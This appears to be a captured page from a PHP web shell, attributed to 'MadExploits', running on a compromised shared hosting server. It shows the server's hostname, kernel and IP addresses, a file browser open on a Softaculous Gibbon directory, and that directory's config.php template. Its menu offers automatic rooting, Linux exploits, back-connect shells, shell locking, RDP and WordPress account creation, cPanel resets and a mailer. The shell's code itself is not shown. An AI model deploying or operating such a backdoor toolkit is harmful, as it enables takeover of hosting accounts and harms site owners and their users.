Linux host45.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 198.54.116.152 | : 216.73.216.202
Cant Read [ /etc/named.conf ]
8.1.32
bankpromax
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
gibbon /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
changelog.txt
9.98
KB
-rw-r--r--
clone.php
5.14
KB
-rw-r--r--
config.php
1.44
KB
-rw-r--r--
edit.php
4.31
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
1.05
KB
-rw-r--r--
gibbon.sql
438.86
KB
-rw-r--r--
gibbon.zip
113.87
MB
-rw-r--r--
import.php
3.5
KB
-rw-r--r--
info.xml
7.21
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
5.82
KB
-rw-r--r--
install.xml
1.73
KB
-rw-r--r--
md5
1.61
KB
-rw-r--r--
notes.txt
1.68
KB
-rw-r--r--
upgrade.php
4.54
KB
-rw-r--r--
upgrade.xml
367
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php /* Gibbon: the flexible, open school platform Founded by Ross Parker at ICHK Secondary. Built by Ross Parker, Sandra Kuipers and the Gibbon community (https://gibbonedu.org/about/) Copyright © 2010, Gibbon Foundation Gibbon™, Gibbon Education Ltd. (Hong Kong) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. */ /** * Sets the database connection information. * You can supply an optional $databasePort if your server requires one. */ $databaseServer = '[[softdbhost]]'; $databaseUsername = '[[softdbuser]]'; $databasePassword = '[[softdbpass]]'; $databaseName = '[[softdb]]'; /** * Sets a globally unique id, to allow multiple installs on a single server. */ $guid = '[[guid]]'; /** * Sets system-wide caching factor, used to balance performance and freshness. * Value represents number of page loads between cache refresh. * Must be positive integer. 1 means no caching. */ $caching = 10;
Close